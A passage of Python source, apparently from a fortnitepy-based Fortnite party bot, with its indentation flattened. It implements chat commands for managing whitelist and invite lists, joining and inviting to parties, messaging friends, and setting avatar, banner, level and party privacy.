data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removewhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removewhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in whitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['get']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['get']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'```\n{x}\n```',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')
else:
client.select[message.author.id] = {
"exec": [
"""\
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'>>> {x}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_get_userinfo')}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['friendcount']:
try:
send(display_name,f"{l('friendcount')}: {len(client.friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('friendcount')}: {len(client.friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendingcount']:
try:
send(display_name,f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockcount']:
try:
send(display_name,f"{l('blockcount')}: {len(client.blocked_users)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('blockcount')}: {len(client.blocked_users)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['friendlist']:
try:
text = ''
for friend in client.friends:
client.add_cache(friend)
text += f'\n{name(friend)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendinglist']:
try:
outgoing = ''
incoming = ''
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
outgoing += f'\n{name(pending)}'
elif pending.incoming:
incoming += f'\n{name(pending)}'
send(display_name,f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blocklist']:
try:
text = ''
for block in client.blocked_users:
client.add_cache(block)
text += f'\n{name(block)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['wait']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
client.acceptinvite = False
try:
client.timer_.cancel()
except AttributeError:
pass
client.timer_ = Timer(data['fortnite']['waitinterval'], client.inviteaccept)
client.timer_.start()
await reply(message, client, l('decline_invite_for', str(data['fortnite']['waitinterval'])))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['join']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['join']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_joining_to_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"{l('enter_to_join_party')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_joining_to_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['joinid']:
try:
await client.join_party(party_id=args[1])
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['join']}] [{l('party_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['leave']:
try:
await client.party.me.leave()
await reply(message, client, l('party_leave', client.party.id))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_leaving_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['invite']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['invite']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_partyinvite'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_invite_user')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_partyinvite'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['inviteall']:
try:
[loop.create_task(client.party.invite(inviteuser)) for inviteuser in client.invitelist]
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['message']:
try:
text = rawcontent.split(' : ')
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(text[0])
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))""" for user in users.values()
],
"variable": [
{"user": user, "text": text} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['message']}] [{l('name_or_id')}] : [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['partymessage']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['partymessage']}] [{l('content')}]")
return
await client.party.send(rawcontent)
await reply(message, client, l('party_sent', client.party.id, rawcontent))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['sendall']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['sendall']}] [{l('content')}]")
return
tasks = {}
for client_ in loadedclients:
mes = AllMessage(rawcontent, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result
if result.get(client_.user.id):
results = '\n'.join(result[client_.user.id])
await reply(message, client, f"[{name(client_.user)}] {results}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['status']:
try:
client.status_ = rawcontent
await client.change_status()
await reply(message, client, l('set_to', l('status'), rawcontent))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['status']}] [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['avatar']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['avatar']}] [ID]")
return
if len(args) > 4:
background_colors = [args[2], args[3], args[4]]
elif len(args) == 2:
background_colors = None
else:
background_colors = getattr(fortnitepy.KairosBackgroundColorPreset, args[2])
avatar = fortnitepy.Avatar(asset=args[1], background_colors=background_colors)
client.set_avatar(avatar)
await reply(message, client, l('set_to', l('avatar'), f"{args[1]}, {background_colors}"))
except AttributeError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('color_must_be'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['banner']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,args[1],args[2],client.party.me.banner[2]))
await reply(message, client, l('set_to', l('banner'), f"{args[1]}, {args[2]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['banner']}] [{l('bannerid')}] [{l('color')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['level']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,client.party.me.banner[0],client.party.me.banner[1],int(args[1])))
await reply(message, client, l('set_to', l('level'), args[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('must_be_int'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['level']}] [{l('level')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['bp']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_battlepass_info,True,args[1],args[2],args[3]))
await reply(message, client, l('set_to', l('bpinfo'), f"{l('tier')}: {args[1]}, {l('xpboost')}: {args[2]}, {l('friendxpboost')}: {args[3]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_bpinfo'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['bp']}] [{l('tier')}] [{l('xpboost')}] [{l('friendxpboost')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['privacy']:
try:
privacies = [
"privacy_public",
"privacy_friends_allow_friends_of_friends",
"privacy_friends",
"privacy_private_allow_friends_of_friends",
"privacy_private"
]
for privacy in privacies:
if args[1] in commands[privacy]:
priv = getattr(PartyPrivacy,privacy.replace("privacy_","",1).upper()).value
await client.party.set_privacy(priv)
await reply(message, client, l('set_to', l('privacy'), l(privacy.replace("privacy_","",1))))
break
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['privacy']}] [[{commands['privacy_public']}] / [{commands['privacy_friends_allow_friends_of_friends']}] / [{commands['privacy_friends']}] / [{commands['privacy_private_allow_friends_of_friends']}] / [{commands['privacy_private']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getuser']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getuser']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
